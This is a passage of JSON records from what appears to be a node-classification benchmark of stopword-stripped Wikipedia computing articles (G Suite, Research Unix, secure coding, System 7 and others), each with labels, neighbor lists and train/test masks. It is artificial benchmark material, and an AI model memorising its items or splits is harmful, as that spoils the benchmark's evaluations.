    "text": "Web_Services_for_Remote_Portlets:web services remote portlets web services remote portlets wsrp oasis-approved network protocol standard designed communications remote portlets wsrp specification defines web service interface interacting presentation-oriented web services initial work produced joint efforts web services interactive applications wsia web services remote portlets wsrp oasis technical committees approval wsrp v1 oasis standard september 2003 two technical committees merged continued work web services remote portlets wsrp oasis technical committee scenarios motivate wsrp functionality include wsrp specification make statements implementation java portlet specification jsr 168 wsrp competing technologies jsr 168 may used define portlet wsrp may used define portlet operations remote containers jsr 168 portlets wsrp may used together define portlet provide remote operations similarly .net portlets may created use wsrp interoperability jsr 168 .net wsrp implementations demonstrated several wsrp implementations assist developers first release wsrp v1 provided limited interoperability platform versions wsrp v1 abandoned effort could concentrated wsrp v2 wsrp v2 augments initial standard cross-portlet coordination access management features major update standard permits useful integration multiple content sources regardless whether local remote new web application addition wsrp v2 supports web 2.0 technologies ajax rest without requiring wsrp v2 approved oasis april 1 2008",
    "neighbors": [
      1802,
      10506,
      9229,
      11154,
      1556,
      10020,
      10026,
      7212,
      10284,
      4658,
      9012,
      2485,
      1468,
      4797,
      8644,
      7878,
      11466,
      3920,
      5849,
      5593,
      865,
      1250,
      7784,
      9834,
      8689,
      9841,
      4979,
      3573,
      3323,
      124,
      9726
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6367,
    "label": 7,
    "text": "G_Suite:g suite g suite formerly google apps work google apps domain brand cloud computing productivity collaboration tools software products developed google first launched august 28 2006 google apps domain g suite comprises gmail hangouts calendar google+ communication drive storage docs sheets slides forms sites collaboration depending plan admin panel vault managing users services also includes digital interactive whiteboard jamboard app development platform app maker services free use consumers g suite adds enterprise features custom email addresses domain yourcompany.com option unlimited cloud storage depending plan number members additional administrative tools advanced settings well 24/7 phone email support based google data centers data information saved instantly synchronized data centers backup purposes unlike free consumer-facing services g suite users see advertisements using services information data g suite accounts get used advertisement purposes furthermore g suite administrators fine-tune security privacy settings g suite 4 million paying businesses 70 million g suite education users february 10 2006 google started testing gmail domain san jose city college hosting gmail accounts sjcc domain addresses admin tools account management august 28 2006 google launched google apps domain set apps organizations available free beta service included gmail google talk google calendar google page creator later replaced google sites dave girouard google vice president general manager enterprise outlined benefits business customers organizations let google experts delivering high quality email messaging web-based services focus needs users day-to-day business google announced edition schools known google apps education october 10 2006 february 22 2007 google introduced google apps premier edition differed free version offering storage 10 gb per user apis business integration 99.9 uptime gmail 24/7 phone support cost 50 per user account per year according google early adopters google apps premier edition included procter gamble san francisco bay pediatrics salesforce.com additionally editions google apps able use google documents spreadsheets users could access gmail blackberry mobile devices administrators gained application control enhancements came june 25 2007 google added number features google apps including mail migration external imap servers shared address books visual overhaul google docs google sheets increased gmail attachment size zdnet article noted google apps offered tool switching popular exchange server lotus notes positioning google alternative microsoft ibm october 3 2007 month acquiring postini google announced startup email security compliance options added google apps premier edition customers ability better configure spam virus filtering implement retention policies restore deleted messages give administrators access emails google introduced google sites february 28 2008 google sites provided simple new google apps tool creating intranets team websites june 9 2009 google launched google apps sync microsoft outlook plugin allows customers synchronize email calendar contacts data outlook google apps less month later july 7 2009 google announced services included google apps—gmail google calendar google docs google talk—were beta google opened google apps marketplace march 9 2010 online store third-party business applications integrate google apps make easier users software business cloud participating vendors included intuit appirio atlassian july 26 2010 google introduced edition governments then-known google apps government designed meet public sector unique policy security needs also announced google apps become first suite cloud applications receive federal information security management act fisma certification accreditation nearly five years launch google apps april 26 2011 google announced organizations 10 users longer eligible free edition google apps would sign paid version known google apps business flexible billing plan also introduced giving customers option paying 5 per user per month contractual commitment march 28 2012 google launched google vault optional electronic discovery archiving service google apps business customers april 24 2012 google introduced google drive platform storing sharing files google apps business user given 5gb drive storage option purchase later year google announced free version google apps would longer available new customers google unified storage drive gmail may 13 2013 giving google apps customers 30gb total shared across apps march 10 2014 google launched google apps referral program offers participating individuals 15 referral bonus new google apps user refer google june 25 2014 announced drive work new google apps offering featuring unlimited file storage advanced audit reporting new security controls 10 per user per month google enterprise company business product division officially renamed google work september 2 2014 eric schmidt google executive chairman said never set create traditional 'enterprise business—we wanted create new way work ... time come name catch ambition google announced google apps would rebranded g suite september 29 2016 october 25 2016 google launched first hardware product g suite jamboard 55-inch digital whiteboard connected cloud g suite comprises gmail hangouts calendar drive storage docs sheets slides forms sites collaboration admin panel vault managing users services basic plan includes email addresses custom domains yourcompany.com video voice calls calendars 30gb storage collaborative documents spreadsheets presentations sites controls security privacy 24/7 phone email support business plan adds vault ediscovery enables many additional custom features including advanced admin controls drive unlimited storage 1tb per user fewer 5 users drive audit reporting insights drive content sharing custom message retention policies us 50 per account per year us 5 per account per month official prices affiliates give discount codes 20 first year gmail web-based email service launched limited beta release april 2004 1 billion active consumer users worldwide february 2016 become popular giving users large amounts storage space threaded conversations robust search capabilities part g suite gmail comes additional features designed business use including google drive file storage synchronization service launched april 24 2012 official announcement described drive place create share collaborate keep stuff google drive users upload type file cloud share others access computer tablet smartphone users sync files device cloud apps microsoft windows apple macos computers android ios smartphones tablets part g suite google drive comes additional features designed business use including google docs google sheets google slides respectively word processor spreadsheet presentation program three programs originate company acquisitions 2006 today integrated google drive serve collaborative software allow users view edit documents spreadsheets presentations together real-time web browser mobile device changes saved automatically revision history keeping track changes also capability set user permission levels designate view comment edit document well permissions download specific document google forms meanwhile tool allows collecting information users via personalized survey quiz information collected automatically connected spreadsheet spreadsheet populated survey quiz responses june 2014 google introduced office support google docs sheets slides without need file conversion writing techcrunch frederic lardinois wrote google clearly positioning apps affordable solutions companies need occasionally edit office files part g suite google docs slides come additional features designed business use including unlimited revision history g suite also garnered strong following education 70 million users 2017 google forms survey application forms features collaboration sharing features found docs sheets slides also used create quizzes including specialized functions use educational settings google sites creation tool allows multiple people create edit websites without requiring coding knowledge web design skills introduced february 2008 effort help customers quickly gather variety information one place – including videos calendars presentations attachments text – easily share viewing editing small group entire organization world google calendar online calendar intended help keep track time schedules launched april 2006 integrates gmail users easily add events email messages directly calendar part g suite google calendar comes additional features designed business use including google apps domain launched 2006 google talk used communication later replaced may 2013 google hangouts messaging service incorporates technology different communication services google developed hangouts supports text voice video conversations video 25 participants cross-platform web android ios july 2014 google announced hangouts would covered 99.9 uptime guarauntee gmail google drive well 24/7 phone email support part g suite google hangouts comes additional features designed business use including invite-only quietly releasing ios app february 2017 google formally launched hangouts meet march 2017 service unveiled video conferencing app 30 participants described enterprise-friendly version hangouts launch featured web app android app ios app features g suite users include google hangouts meet standards-based video conferencing application using proprietary protocols video audio data transcoding google partnered pexip provide interoperability google protocol standards-based sip/h.323 protocols enable communications hangouts meet video conferencing equipment software google+ used let team members engage communicate deeper level stream featuring posts comments communities based common goals makes easy anyone discuss share ideas matter team level location features collections make easy group posts topic order users show know follow matters part g suite google+ comes additional features designed business use including google+ g suite continues available even consumer version google+ shut april 2 2019 google keep note-taking service variety tools notes including text lists voice images google keep became part g suite february 2017 part g suite google keep comes additional features designed business use including google vault archiving electronic discovery service exclusively available g suite customers announced march 28 2012 vault gives users easy-to-use cost-effective solution managing information critical business preserving important data google stating reduce costs litigation regulatory investigation compliance actions saving managing gmail messages chat logs ability search manage data based filters terms dates senders recipients labels update june 2014 let vault customers search preview copy export files google drive october 2016 google announced jamboard first hardware product designed g suite jamboard digital interactive whiteboard enables collaborative meetings brainstorming jamboard connected cloud enables people different locations work together real-time multiple jamboards connected remotely smartphone companion app jamboard recognizes different touch inputs using stylus sketch eraser start require batteries pairing jamboard 55-inch 4k display built-in hd camera speakers wi-fi g suite marketplace formerly google apps marketplace launched 2010 online store business-oriented cloud applications augment g suite functionality marketplace lets administrators browse purchase deploy integrated cloud applications comprises business tools productivity education communication utilities categories september 2014 google released blog post saying employees would able install third-party apps marketplace without involving administrators introduced february 2017 google cloud search enables unified search experience g suite cloud search lets users search information across entire g suite product lineup users also search contacts results including person contact details well events files common cloud search mobile app features assist cards described google new way help find right information right time using google machine intelligence technology cards help prepare upcoming meeting even suggest files need attention google states cloud search respects file-sharing permissions meaning users see results files access initial global roll-out cloud search introduced functionality g suite business enterprise customers google stating functionality added time including support third-party applications introduced july 2017 hire job applications management tool developed google used combination g suite tool lets employers track job candidates contact information well résumés calendar invitations allows business partners share feedback candidates job applicants choose information share potential employers tool designed businesses based united states fewer 1,000 employees integrates google services gmail sending messages google calendar tracking schedules google sheets overview candidates google hangouts initial conversations google introduced work insights september 2018 administrators see departments using google products google states collect scan use g suite data advertising purposes display ads g suite education government core services furthermore states data companies schools government agencies put g suite services belong google whether corporate intellectual property personal information homework assignment google data google sell data third parties data stored google data centers built custom-designed servers run operating system security performance 550 full-time security privacy professionals blog post google stated benefits using g suite included disaster recovery data information simultaneously replicated two data centers one data center fails nearly instantly transfer data one also reflecting actions though acknowledging backup solution us anyone else absolutely perfect google states invested lot effort help make second none encryption specifically aes 128-bit stronger applied data stored data centers transit data centers users data centers introduction june 2014 techcrunch reported google drive part g suite offers enterprise-grade security compliance including ssae 16 isae 3402 type ii soc 2-audit certification adherence safe harbor privacy principles support industry-specific requirements like health insurance portability accountability act hipaa google 3 million businesses paying g suite 70 million g suite education users september 2014 amit singh then-president then-named google work stated 60 percent fortune 500 companies paying service 1,800 customers signing week notable companies using g suite include uber allsaints buzzfeed design within reach pwc march 2014 google announced google apps referral program united states canada program lets users receive money coupons incentives referring customers g suite december 2014 google introduced google work education partner program program combined existing individual programs apps chrome cloud platform maps search one overall program allows partners better sell service innovate across google work education suite products platforms august 2011 review pc world tony bradley wrote value rival platform google apps hinges compatible microsoft office formatting conventions file types praising google gone great lengths improve fidelity microsoft office n't gone far enough criticizing many features reformatted including tables contents footnotes inserted images bradley praised google collaborative apps writing besting microsoft offers office 365 regarding price wrote google package best value annual pricing 50 per user per year makes third less per user per year office 365 yet boasts equivalent functionality sufficient small medium organizations gary marshall techradar commented 2016 office tries everything imaginable google suite much basic said much powerful package debuted 2006 emphasis simplicity speed remains marshall wrote would n't want craft massive complicated manuscript google docs n't docs designed fast user-friendly way create everyday documents share colleagues clients fellow service google sheets covers common excel functions ... n't power microsoft offering marshall praised collaboration effortless praised importing external file formats making editable collaborative big selling point pc magazine eric grevstad wrote online get adding configuring work offline rigmarole stated package illustration software version 80/20 rule ... 80 percent users never need 20 percent features stated comparing g suite office 2016 like bringing handgun cannon fight ... microsoft pc-based suite designed almost every feature anyone might ever need google online suite designed features people use daily tom hardware james gaskin wrote like google products claim cleanest minimal interface market suite except office 365 get close ease collaboration google provides even microsoft product trails wide margin changes appear real-time word 2016 apps conclusively wrote progress made first google app release considerable world moves mobile computing google distinct advantage tradition dies hard build basic documents spreadsheets presentations remain tied desktops laptops time google+ launched many articles published emphasized presence google+ helped business google search result rankings particularly public-facing pages +1 buttons pushed effective marketing strategies however writing new york times quentin hardy said sour grapes version google plus ’ getting anything like buzz traffic facebook google figuring ways make service relevant however hardy note integration google+ popular google services including hangouts meant ’ still early ’ easy see could efficient way bring workers virtual meeting collaborate embed calendar future work commitments follow-up result key competitor google suite microsoft office 365 microsoft cloud-based offering businesses includes similar products key differences pricing plans storage space number features noted techrepublic 2013 pricing plans differ google apps quick easy pricing plan standard google apps business package 5 per user per month 50 per user per year ... contrast office 365 multitude plans six september 2013 good bad since provides flexibility also involves complexity figure best choice storage space varies office 365 gives users 50 gb space outlook 1 tb onedrive google apps provides 30 gb space spread among gmail drive picasa regarding features states office 365 advantage plenty users familiar word excel rest gang years less learning curve google apps latter represents brand new experience ... however also true office notorious loaded complex unused features cause confusion familiarity many embrace also comes something price especially companies paying advanced packages employees use contrast google apps programs fairly easy learn intuitive may feel awkward hard-coded work office stephen shankland cnet wrote 2014 hard compare google apps success microsoft office since google n't release revenue user figures microsoft 60 million commercial customers signed office 365 product offering 50,000 small business customers added office 365 month",
    "neighbors": [
      4096,
      1539,
      4621,
      526,
      4623,
      3600,
      8719,
      7700,
      10265,
      9244,
      5662,
      5666,
      9766,
      39,
      5159,
      10284,
      3629,
      3121,
      3633,
      5681,
      10820,
      4683,
      590,
      79,
      1102,
      3664,
      5202,
      7248,
      11343,
      8285,
      2658,
      4194,
      5732,
      8821,
      2679,
      4728,
      2170,
      9347,
      7816,
      4236,
      6797,
      5262,
      7822,
      6800,
      10893,
      11408,
      5780,
      10393,
      8858,
      2208,
      7841,
      6307,
      2217,
      9906,
      1203,
      7352,
      7359,
      4289,
      196,
      3269,
      3782,
      1224,
      10445,
      3795,
      1240,
      8413,
      9949,
      2795,
      236,
      3819,
      9970,
      7926,
      3323,
      3836,
      253,
      8446,
      8451,
      5892,
      8455,
      272,
      2328,
      1817,
      4377,
      8986,
      10009,
      10525,
      798,
      3870,
      288,
      11038,
      4901,
      6444,
      8495,
      5431,
      2875,
      10045,
      11070,
      8515,
      11590,
      8520,
      11592,
      4429,
      9039,
      3409,
      1362,
      7512,
      3428,
      9063,
      10090,
      5483,
      7532,
      877,
      8044,
      5499,
      7548,
      11646,
      1409,
      6018,
      4995,
      9610,
      6027,
      911,
      1935,
      8592,
      5522,
      1427,
      5524,
      405,
      2965,
      10645,
      1435,
      2978,
      1959,
      8103,
      3499,
      7595,
      950,
      10681,
      448,
      2496,
      11201,
      454,
      4044,
      4048,
      9682,
      467,
      10200,
      6618,
      488,
      1001,
      6632,
      10219,
      5100,
      7660,
      9712,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 6368,
    "label": 4,
    "text": "Charlie_Miller_(security_researcher):charlie miller security researcher charles alfred miller american computer security researcher cruise automation prior current employment spent five years working national security agency worked uber miller holds bachelors mathematics minor philosophy northeast missouri state truman state university ph.d. mathematics university notre dame 2000 currently lives wildwood missouri miller publicly demonstrated many security exploits apple products 2008 10,000 cash prize hacker conference pwn2own vancouver british columbia canada first find critical bug macbook air following year 5,000 cracking safari 2009 collin mulliner demonstrated sms processing vulnerability allowed complete compromise apple iphone denial-of-service attacks phones 2011 found security hole iphone ipad whereby application contact remote computer download new unapproved software execute command could steal personal data otherwise using ios applications functions malicious purposes proof concept miller created application called instastock approved apple app store informed apple security hole promptly expelled app store miller participated research discovering security vulnerabilities nfc near field communication also published three books miller along chris valasek widely known remotely hacking 2014 jeep cherokee controlling braking steering acceleration vehicle",
    "neighbors": [
      9732,
      9063,
      2409,
      2508,
      7887,
      9424,
      918,
      3643,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6369,
    "label": 2,
    "text": "Research_Unix:research unix research unix refers early versions unix operating system dec pdp-7 pdp-11 vax interdata 7/32 8/32 computers developed bell labs computing sciences research center term research unix first appeared bell system technical journal vol 57 6 pt 2 jul/aug 1978 distinguish versions internal bell labs pwb/unix mert whose code-base diverged primary csrc version however term little-used version 8 unix retroactively applied earlier versions well prior v8 operating system commonly called simply unix caps unix time-sharing system licensed version 5 educational institutions version 6 also commercial sites schools paid 200 others 20,000 discouraging commercial use version 6 widely used version 1980s research unix versions often referred edition manual describes early versions last never officially released outside bell labs grew organically first research unix would first edition last tenth edition another common way referring version x v x unix x manual edition modern editions unix—excepting unix-like implementations coherent minix linux—derive 7th edition starting 8th edition versions research unix close relationship bsd began using 4.1cbsd basis 8th edition usenet post 2000 dennis ritchie described later versions research unix closer bsd unix system v also included bsd code 2002 caldera international released unix v1 v2 v3 v4 v5 v6 v7 pdp-11 unix 32v vax foss permissive bsd-like software license 2017 unix heritage society alcatel-lucent usa inc. behalf nokia bell laboratories released v8 v9 v10 condition assert copyright rights respect non-commercial copying distribution performance display creation derivative works research unix®1 editions 8 9 10",
    "neighbors": [
      2560,
      7682,
      9735,
      8725,
      1561,
      7224,
      9784,
      1594,
      2120,
      6218,
      3659,
      9298,
      2132,
      1109,
      11363,
      6760,
      9320,
      8306,
      633,
      5759,
      640,
      2179,
      132,
      6787,
      3206,
      2198,
      3222,
      6812,
      671,
      7848,
      3241,
      3248,
      2233,
      7356,
      10436,
      2253,
      9946,
      9444,
      9452,
      4333,
      11501,
      4859,
      2301,
      11013,
      6412,
      11023,
      787,
      5397,
      3350,
      1304,
      8991,
      9507,
      7460,
      6445,
      4398,
      7983,
      8499,
      310,
      823,
      9027,
      9542,
      1865,
      10569,
      8012,
      8524,
      4433,
      8020,
      11604,
      11608,
      6502,
      11112,
      9578,
      5492,
      3960,
      2424,
      5506,
      3976,
      5000,
      11145,
      7566,
      414,
      3487,
      1952,
      3488,
      6049,
      5036,
      10156,
      1971,
      2995,
      9141,
      8631,
      10170,
      9151,
      451,
      1987,
      6601,
      470,
      6617,
      6624,
      1508,
      6120,
      4076,
      5106,
      2035,
      9204,
      9714,
      6138,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6370,
    "label": 2,
    "text": "Composite_UI_Application_Block:composite ui application block composite ui application block cab addition microsoft .net framework creating complex user interfaces made loosely coupled components developed microsoft patterns practices team cab used exclusively developing windows forms derivative version cab exists web client mobile client software factories well encourages developer use either model-view-controller model-view-presenter architectural pattern encourage reuse individual user controls referred cab smartparts coupling underlying data elements presentation code part foundation smart client software factory another patterns practices deliverable also part mobile client software factory version smart client software factory use .net compact framework 2.0",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6371,
    "label": 2,
    "text": "List_of_live_CDs:list live cds list live cds live cd live dvd cd-rom dvd-rom containing bootable computer operating system live cds unique ability run complete modern operating system computer lacking mutable secondary storage hard disk drive directly based debian large number live cds based knoppix list derivatives section knoppix article based least partially ubuntu based debian microsoft representatives described third-party efforts producing windows-based live cds improperly licensed uses windows unless used solely rescue properly licensed installation however nu2 productions believes use bartpe legal provided one windows license purchased bartpe cd windows license used nothing else systems based former open source os/net nevada onnv open source project sun microsystems illumos fork former opensolaris onnv aiming develop onnv replacing closed source parts remaining binary compatible following products based upon illumos",
    "neighbors": [
      11648,
      516,
      2180,
      8837,
      3079,
      5895,
      1802,
      2064,
      10896,
      11410,
      2967,
      8727,
      3097,
      8857,
      10394,
      4637,
      7840,
      3745,
      6049,
      9377,
      292,
      6436,
      8998,
      6055,
      10920,
      6445,
      7983,
      9910,
      823,
      8119,
      5177,
      8248,
      3643,
      8124,
      9407,
      576,
      8005,
      3147,
      1485,
      9807,
      1107,
      2005,
      6361,
      9689,
      6491,
      11481,
      5469,
      5470,
      5343,
      9693,
      2914,
      11363,
      3685,
      4841,
      7913,
      10732,
      10860,
      3058,
      499,
      4978,
      6898,
      7027,
      8700,
      9844,
      6393,
      6012,
      8957,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 6372,
    "label": 4,
    "text": "File_integrity_monitoring:file integrity monitoring file integrity monitoring fim internal control process performs act validating integrity operating system application software files using verification method current file state known good baseline comparison method often involves calculating known cryptographic checksum file original baseline comparing calculated checksum current state file file attributes also used monitor integrity generally act performing file integrity monitoring automated using internal controls application process monitoring performed randomly defined polling interval real-time changes configurations files file attributes across infrastructure common hidden within large volume daily changes impact file configuration integrity changes also reduce security posture cases may leading indicators breach progress values monitored unexpected changes files configuration items include multiple compliance objectives indicate file integrity monitoring requirement several examples compliance objectives requirement file integrity monitoring include examples include",
    "neighbors": [
      2432,
      2656,
      7809,
      11429,
      4423,
      9420,
      687,
      7983,
      11664,
      9650,
      1907,
      5780,
      4471,
      7192,
      3353,
      186,
      8471,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 6373,
    "label": 4,
    "text": "Secure_coding:secure coding secure coding practice developing computer software way guards accidental introduction security vulnerabilities defects bugs logic flaws consistently primary cause commonly exploited software vulnerabilities analysis thousands reported vulnerabilities security professionals discovered vulnerabilities stem relatively small number common software programming errors identifying insecure coding practices lead errors educating developers secure alternatives organizations take proactive steps help significantly reduce eliminate vulnerabilities software deployment buffer overflows common software security vulnerability happen process tries store data beyond fixed-length buffer example 8 slots store items problem attempt store 9 items computer memory overflowed data may overwrite data next location result security vulnerability stack smashing program termination segmentation fault example c program prone buffer overflow int vulnerable_function char large_user_input user input larger destination buffer buffer overflow occur fix unsafe program use strncpy prevent possible buffer overflow int secure_function char user_input another secure alternative dynamically allocate memory heap using malloc char secure_copy char src code snippet program attempts copy contents src dst also checking return value malloc ensure enough memory able allocated destination buffer format string attack malicious user supplies specific inputs eventually entered argument function performs formatting printf attack involves adversary reading writing stack c printf function writes output stdout parameter printf function properly formatted several security bugs introduced program vulnerable format string attack int vulnerable_print char malicious_input malicious argument passed program could “ ” crash program improper memory reads integer overflow occurs arithmetic operation results integer large represented within available space program properly check integer overflow introduces potential software bugs exploits function c++ attempts confirm sum x less equal defined value max bool sumisvalid_flawed unsigned int x unsigned int problem code check integer overflow addition operation sum x greater maximum possible value codice_1 addition operation overflow perhaps result value less equal max even though sum x greater max function checks overflow confirming sum greater equal x sum overflow sum would less x less y. bool sumisvalid_secure unsigned int x unsigned int",
    "neighbors": [
      899,
      5636,
      10756,
      9607,
      9356,
      9488,
      3473,
      8978,
      5245,
      10392,
      1689,
      5246,
      5373,
      4892,
      5404,
      2975,
      2084,
      2213,
      8998,
      939,
      3629,
      9646,
      3887,
      5040,
      7855,
      1970,
      11567,
      7734,
      5433,
      7739,
      3262,
      9791,
      1474,
      3525,
      7368,
      9160,
      5325,
      4435,
      2262,
      6360,
      9688,
      7515,
      4956,
      3941,
      107,
      11244,
      2041,
      10492,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 6374,
    "label": 0,
    "text": "Language_Computer_Corporation:language computer corporation language computer corporation lcc natural language processing research company based richardson texas company develops variety natural language processing products including software question answering information extraction automatic summarization since founding 1995 low-profile company landed significant united states government contracts 8,353,476 contracts 2006-2008 company focused primarily government software market lcc also used technology spin three start-up companies first spin known lymba corporation markets poweranswer question answering product originally developed lcc 2010 lcc ceo andrew hickl co-founded two start-ups made use company technology included swingly automatic question answering start-up extractiv information extraction service founded partnership houston texas-based 80legs",
    "neighbors": [
      1890,
      7780,
      5197,
      11538,
      2459
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6375,
    "label": 4,
    "text": "InSSIDer:inssider inssider wi-fi network scanner application microsoft windows os x developed metageek llc received awards 2008 infoworld bossie award best open source software networking inssider 3 longer open-source inssider began replacement netstumbler popular windows wi-fi scanner actively developed several years reputedly work modern 64-bit operating systems versions windows higher windows xp project inspired charles putney code project",
    "neighbors": [
      231,
      6797,
      4174,
      7983,
      61,
      7411,
      3573,
      7222,
      2045,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 6376,
    "label": 8,
    "text": "Baynote:baynote baynote san jose california-based software company offering web search recommendation software service products based concept wisdom crowd also known collective intelligence search results ranked based analysis links pages visited users past september 2016 kibo software inc. announced purchased baynote undisclosed amount",
    "neighbors": [
      467,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6377,
    "label": 3,
    "text": "System_7:system 7 system 7 codenamed big bang sometimes retrospectively called mac os 7 graphical user interface-based operating system macintosh computers part classic mac os series operating systems introduced may 13 1991 apple computer inc succeeded system 6 main macintosh operating system succeeded mac os 8 1997 features added system 7 release included virtual memory personal file sharing quicktime quickdraw 3d improved user interface release version 7.6 1997 apple officially renamed operating system mac os name first appeared system 7.5.1 boot screen system 7 developed macs used motorola 680x0 line processors ported powerpc apple adopted new processor 1994 introduction power macintosh development macintosh system software system 6 followed fairly smooth progression addition new features relatively small changes upgrades time major additions fairly limited notably adding color quickdraw system 6 perspective scope changes seen examining official system documentation inside macintosh initially shipped three volumes adding another describe changes introduced mac plus another mac ii mac se limited changes meant original macintosh system remained largely initially introduced machine geared towards single user task running floppy disk based machine extremely limited ram however many assumptions model longer appropriate notable among single-tasking model replacement first examined 1986 switcher replaced outright multifinder system 5 running multifinder normally required larger amount ram hard drive became common late 1980s additions relatively limited fixes underlying oddities system architecture instance support limited form multitasking original mac os supported small co-resident programs known desk accessories installed system using special tools system able support multiple tasks one-off solution would longer needed — desk accessories could simply small programs placed anywhere yet multifinder still optional step taken numerous examples sort problem could found throughout system finally widespread adoption hard drives local area networks led number new features requested users developers late 1980s list new upgrades suggested changes existing model considerable march 1988 shortly release system 6 technical middle managers apple held offsite meeting plan future course mac os development ideas written index cards features seemed simple enough implement short term like adding color user interface written blue cards longer-term goals like true multitasking pink cards far ideas like object-oriented file system red cards development ideas contained blue pink cards proceed parallel first two projects known simply blue pink including taligent apple intended blue team came call blue meanies characters yellow submarine release updated version existing macintosh operating system 1990–1991 time-frame pink team release entirely new os around 1993 blue aimed relatively simple upgrades feature list reads degree sort system 6 corrected underlying os number formerly optional components made mandatory furthermore number oddities original system typically included due limited resources finally changed use basic underlying os features system also offered wide variety new features system 7 first apple operating system available compact disc although shipped set 15 floppy disks initially unlike earlier systems system 7 come bundled major software packages newly purchased macintosh computers system 7 installed often bundled software hypercard ease mouse practice later macintosh performa family added various software bundles including clarisworks new grolier multimedia encyclopedia microsoft bookshelf spectre vr power pete since system 7 introduced internet came popular attention software mactcp freeppp netscape included first later available disk internet service providers bundled books adam c. engst internet starter kit macintosh power macintosh machines also included nucalc graphing calculator system 7 also includes appletalk networking file sharing software form system extensions control panels basic utilities installed default system 7 include teachtext replaced simpletext later versions basic text editing tasks reading readme documents also available additional disk tools floppy disk disk first aid disk repair apple hd sc setup initializing partitioning disks later versions system 7 specifically system 7.5 mac os 7.6 come dedicated utilities folder apple extras folder including applescript disk copy quickdraw gx extras quicktime movie player optional extras utilities could manually installed system cd system 7.1.2 first version macintosh system software support apple new powerpc-based computers 68k applications yet updated run natively systems emulated transparently without user intervene built-in 68k processor emulator fat binaries contained code necessary run natively powerpc 68k systems became common time process similar distribution universal binaries apple transition intel processors 2006 system 7.0 7.1 offered utility called apple file exchange could access contents fat- apple ii — formatted floppy disks system 7 pro system 7.5 shipped pc exchange previously separate product allowed system mount fat-formatted floppy disks desktop manner regular macintosh disks os/2 disks read pc dos disks due fact os/2 used fat file system time macs could also read write unix file systems help extra software system 7 allowed users access pc networks allowed communication via tcp/ip compatible networking stacks actual pc software compatibility however required third party software softpc allowed ms-dos early microsoft windows programs run connectix virtual pc allowed mac run windows via full pc emulation pc compatibility solutions took native approach running windows ms-dos using x86 expansion cards x86 chip card apple offered systems configured way marketed dos compatible —a card dedicated x86 cpu ram used mac hard drive sound subsystem networking input provided services pc pc could run simultaneously mac user could switch two fashion similar kvm switch earliest systems 680x0 based systems running system 7 system 7 provided support accessing pc volume mac pc exchange software actual control pc hardware accomplished way control panels time release many users noticed performance suffered result upgrading system 6 system 7 though newer hardware soon made speed difference another problem system 7 large memory footprint system 6 could boot system single 800k floppy disk took ram whereas system 7 used well megabyte time average mac shipped enough ram built system 7 truly comfortable system 7 first system release could longer usefully run floppy-only systems although macintosh models sold time included hard disk standard equipment owners older models required upgrade buying either new mac external scsi hard disk drive wished run system 7 order take advantage system 7 virtual memory feature macintosh equipped paged memory management unit pmmu required motorola 68030 cpu one built-in one added motherboard motorola 68020-equipped macintosh ii macintosh model using 68020 macintosh lc use virtual memory apple introduced 68030-equipped macintosh lc ii shortly system 7 introduction despite newer processor lcii retained earlier model 16-bit bus perform faster lc replaced despite setbacks system 7.0 adopted quite rapidly mac users quickly became one base requirements new software engineering group within apple responsible system 7 came known blue meanies named blue index cards written features could implemented relatively short time part apple operating system strategy comparison pink index card features handled pink group later becoming ill-fated taligent project system 7.0 last version macintosh operating system available charge could freely redistributed although system 7 could purchased apple cost nominal considered cover duplication media common macintosh dealers allow customers use store demo machines copy system 7 install disks cost box floppies cd-rom magazines nautilus included system 7 disks mac users downloaded thousands copies system 7 online services aol compuserve genie apple surveyed services based popularity started selling mac os retail product system 7.1 apple continued charging major operating system upgrades release os x mavericks 2013 soon initial release system 7 7.0.1 minor update released october 1991 patch called system 7 tune-up also followed fixed disappearing files bug system would lose files added minimum preferred memory allotments application get info box august 1992 7.1 update released first version system software apple charged money change david pogue wrote new 7.1 fonts folder replaced often time-consuming method dragging fonts system file introduced system 7.0 also replaced font/da mover application system 6 could also used 7.0 system 7.1 also included lot internal changes support internationalization dates time numbers also first version support enablers removed requirement release new version system software every time new hardware released set specialized versions 7.1 ranging 7.1p1 7.1p6 excluding 7.1p4 created included various performa models already available released 7.1 specialized versions included ease launcher changes integrated later versions system software first major upgrade system 7.1.1 also known system 7 pro release bundle 7.1 applescript tools quicktime apple open collaboration environment aoce system 7 trouble running slightly older machines due memory footprint system 7 pro barely fit macintosh computers time commonly used minor bug fixes rather new functionality apple joined aim alliance apple ibm motorola shortly release system 7 1991 started work powerpc-based machines later became power macintosh family support machines resulted system 7.1.2 system 7.1.2 never offered retail sale shipped first batches powerpc macs 68k version shipped small number quadra 600 series systems later shipments shipped system 7.5 instead system 7.1.2p 7.1.2 shipped performa 630 lc 630 quadra 630 models released july november 1994 next major release system 7.5 included bug fixes previous updates added several new features including system 7.5 codenamed capone reference al capone chicago code name microsoft windows 95 also name default system font used mac os version 8 system 7.5.1 primarily bug fix 7.5 also introduced new mac os startup screen preparation mac clones system 7.5.2 released first pci-based power macs notable introducing apple new networking architecture open transport system 7.5.3 major bug-fix update also included open transport powerpc-based machines well 68k-based machines 7.5.3 also made several improvements 68k emulator added translucent dragging support drag manager also included first version control strip compatible macs also first version mac os support smp 9500/mp system 